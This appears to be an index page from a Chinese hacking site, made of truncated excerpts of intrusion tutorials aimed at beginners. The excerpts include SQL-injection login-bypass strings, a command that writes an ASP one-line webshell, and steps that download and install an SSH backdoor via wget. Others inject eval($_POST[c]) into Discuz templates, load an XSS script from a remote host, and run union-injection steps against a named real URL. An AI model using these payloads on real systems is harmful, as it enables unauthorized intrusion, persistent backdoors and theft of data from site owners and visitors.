所谓万能密码就是绕过登录验证直接进入管理员后台的密码，这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。自己也有过收集，别人总结的我又添加了几个aspaspx万能密码1："or"a"="a2：')or('a'='a3：or1=1--4：'or1=1--5：a'or'1=1--6："or1=1--7：'or'a...

[阅读全文]

　　奔流不息的网络里，Web绽放着绚丽的色彩、电子邮件呼哧的穿梭网际、语音电话、网络会议、文件传输，各种数据交织错落，形成辉煌的数字世界。在喧闹的数字世界底层，存在一种精致的次序，这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是，路由器成了数据通信的交通亭，也成...

[阅读全文]

这里谈到的跨站漏洞利用包括跨站脚本攻击、跨站请求伪造以及其它的同源攻击，这些攻击都是目前极普遍的攻击方式。这篇文章可供Web开发人员阅览，也可供网站管理员参考。同源策略最初是随着网景公司的浏览器发布的，它的主要作用是规定浏览器和相关的编程语言应当如何处理安全问题。这种策略的主旨在于限制一个网站访问其它网站上的函数，同时...

[阅读全文]

简要描述：Discuz!7.2/X1心情墙插件SQL注入及持久型XSS漏洞。SQL注入比较鸡肋，要求GPC为off（目前这样的网站几乎绝版了）XSS因为是持久型的，只要管理员打开此应用即会触发。利用XSS怎么操作就见仁见智了。详细说明：由Discuz因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。moodwall...

[阅读全文]

在很多的情况下我们不能直接方便的进行注入，于是有了BENCHMARK延迟注射，如果能得到MySQL的错误信息的话，现在又有了更方便的方法。网上流传了两三种方法,以前我在BLOG也记录了其中一种。http://hacknote.com/read/?728.html前段时间在t00ls上看到的另一种：http://hack...

[阅读全文]

1。简介　　数据库系统分为数据库和数据库管理系统!数据库是存放数据的地方，数据库管理系统则是管理数据库的软件!数据库中数据的存储节构叫数据模型!有四种常见的数据模型，分别是层次模型、网状模型、关系模型和面向对象模型。其中关系数据模型是最主要的数据模型，ACCESS、MSSQL、ORACLE等都是关系模型数据库系统。其中...

[阅读全文]

SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。一、NBSI的命令方法:写入一句话木SHELL,命令如下:echo^<25%executerequest("#")25%^>>d:\web\mm.asp这样要写入一句话木...

[阅读全文]

1、mv/etc/ssh/ssh_config/etc/ssh/ssh_config.old2、mv/etc/ssh/sshd_config/etc/ssh/sshd_config.old3、下载并安装ssh后门:shell-#wgethttp://192.168.1.188/sshbd.tgzshell-#tarzx...

[阅读全文]

当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的，那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url：url的构造格式为：_1][special_char]@[url_2]/target=_blank>http://[url_1][special_char]@[u...

[阅读全文]

今日跨站时，懒得写AJAX代码，想到了利用FORMtarget属性+iframe来模拟恶意表单提交动作。XSS代码：<scriptlanguage='javascript'src='http://www.sswowo.com/hid　e.js'></script>//恶意注入的XSS代码引用了远程我们自己编写的JS脚本...

[阅读全文]

asp+acc/mssql程序主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码...

[阅读全文]

简单的方法无非就是弱口令了方法1.弱口令用到的工具ntscan,recton,木马可惜扫了一下一个弱口令都没有!再用superscan扫了一下port,发现7台电脑在线,只有三台没开防火墙,而且只开了137netbios,123ntp等端口只好放弃此方法方法2.arp欺骗用到的工具arpsniffer在hostos(主...

[阅读全文]

1、无法装载DLLxpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用sqltoolsv2.0就有列目录功能）恭喜你这个有80%的情况能修复了，如果能列目录，那么只要找到xplog70.dll的路径执行以下命...

[阅读全文]

能够入侵一个大学的网站，一直都是各位小菜们的梦想吧？下面就给小菜们提供一个思路。各位老鸟、前辈、骨灰级的人物就跳过吧。前段时间刚给黑防投了一篇关于渗透大学网站的文章，最后成功获得WebShell是通过eWebEditor。这段时间总结了一下思路，呵呵，先让我卖个关子。我这次提供的方法，只用一个工具—&mda...

[阅读全文]

经笔者发掘，渗透cuteeditor的站点时候如果在web.config中获取了DB或public权限时，为xp_dirtree不能用而犯愁时可以通过该方法成功爆出路径。为获取路径的又一方便之处应该没有过滤字符"setting"为空的时候测试方法:http://www.sist.com/CuteSoft_Client/...

[阅读全文]

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）1.后台编辑customfaq(customfaq.lang.php文件)在<?的后面加上eval($_POST[c]);2.后台编辑misc(misc.lang.php文件)把post_reply_quote对应的内容改为";eval($_POST[c]...

[阅读全文]

在腾讯2009年安全技术峰会上我曾经提出一个观点：墨菲定律：如果它能够被黑客攻破，它就将被攻破。对于一个黑客来说，他要黑一个企业，仅仅是时间上的问题，总之是成本上的问题，比如有个盗号集团在支持他，他说我给你一年时间你把这个企业黑了，搞定了就给你多少钱。一年时间我相信只要他有这个毅力，基本上在座的公司逃不过这一劫。这个观...

[阅读全文]

mysql5.xforlinux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。mysql5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利...

[阅读全文]

第一讲：判断有没注射点这个很简单，我们最常用的就是看到页面的格式为：index.php?id=2这样的地址，我们知道PHP经常是和MYSQL数据库一起用的，在MYSQL数据库中一定存在一个表，比如setting_table，我们提交上面地址的时候，程序一般上这样处理的：1、用GET或者POST取我们提交的id=1把这个...

[阅读全文]

帮朋友测试网站安全的渗透入侵全过程,我朋友给呢我一个网站让我看看它的安全性，打开URL粗粗的看呢一下，估计是2000的系统(为什么?看到呢asp嘛）。然后就用X-SCAN（下载地址：http://www.heibai.net/download/Soft/Soft_3870.htm）扫呢一遍，一个漏洞也没有(包括WEBD...

[阅读全文]

1、连接到对方MYSQL服务器mysql-uroot-h192.168.0.1mysql.exe这个程序在你安装了MYSQL的的BIN目录中2、让我们来看看服务器中有些什么数据库mysql>showdatabases;MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数...

[阅读全文]

1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7andord(mid(version(),1,1))>51返回正常，说明大于4.0版本，支持ounion查询2.猜解字段数目,用orderby也可以猜，也可以用unionselect一个一个的猜解...

[阅读全文]

php以其跨平台的优越性著称。很多网站采用php编写。因为没有像asp那么多的入侵工具，很多人对php的后台并不重视。我发现很多的get方式登录的后台，但他们大多都不安全。我们看一个php登陆代码（GET）：$conn=mysql_connect("ip","name","pass");//连接数据库信息$query=...

[阅读全文]

1.查询IIS里的所有网站C:\WINDOWS\system32>cscript.exeiisweb.vbs/queryMicrosoft(R)WindowsScriptHostVersion5.6版权所有(C)MicrosoftCorporation1996-2001。保留所有权利。正在连接到服务器…已...

[阅读全文]

我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，aaa帐号试到zzz(bytheway，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧)，结果一个帐号也不存在，我没有再试它的帐号。因为我...

[阅读全文]

而随着互联网黑色产业链的浮出水面，骇客们发现攻击网站不仅仅可以用作向朋友炫耀的资本，还可以作为购买游戏点卡或者是数码相机的资金来源：在被攻击的网站嵌入脚本木马，可以轻易盗窃那些访问了受攻击网站，但个人PC安全防护措施不全面用户的私密信息，比如游戏账号密码，或者是银行账号密码。　　经常使用google的用户一定对这段话不...

[阅读全文]

最近有网友提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码：　　程序代码　　<%　　username=trim(Request.Form("username"))　　password=trim(Request.Form("password"))　　sql="Select*FROMadminWhereuser=...

[阅读全文]

现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷。正是因为注入攻击的流行，使的市面上的注入工具层出不穷。比较出名的有小竹的NBSI（下载地址：http://www.heibai.net/download/Soft/Soft_5918.h...

[阅读全文]

1.Windows中很有用的文件替换命令，绕过文件保护用来替换文件的replace，连正在使用的文件也能替换。非常无敌。比如：在C：\下建一个目录，c：\aaa然后复制一首mp3到c:\aaa并命名为c:\aaa\a.mp3然后再复制另一首歌到C:\a.mp3然后用mediaplayer播放c:\aaa\a.mp3在命...

[阅读全文]

目标站点是老Y文章管理系统v2.5的。在网上找了下，目前基本上没有什么可直接利用的漏洞，于是开始旁注上http://ip.468w.cn/查了下。服务器上150个站，用superinjection导入全部站点后批量扫描注入点，很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站...

[阅读全文]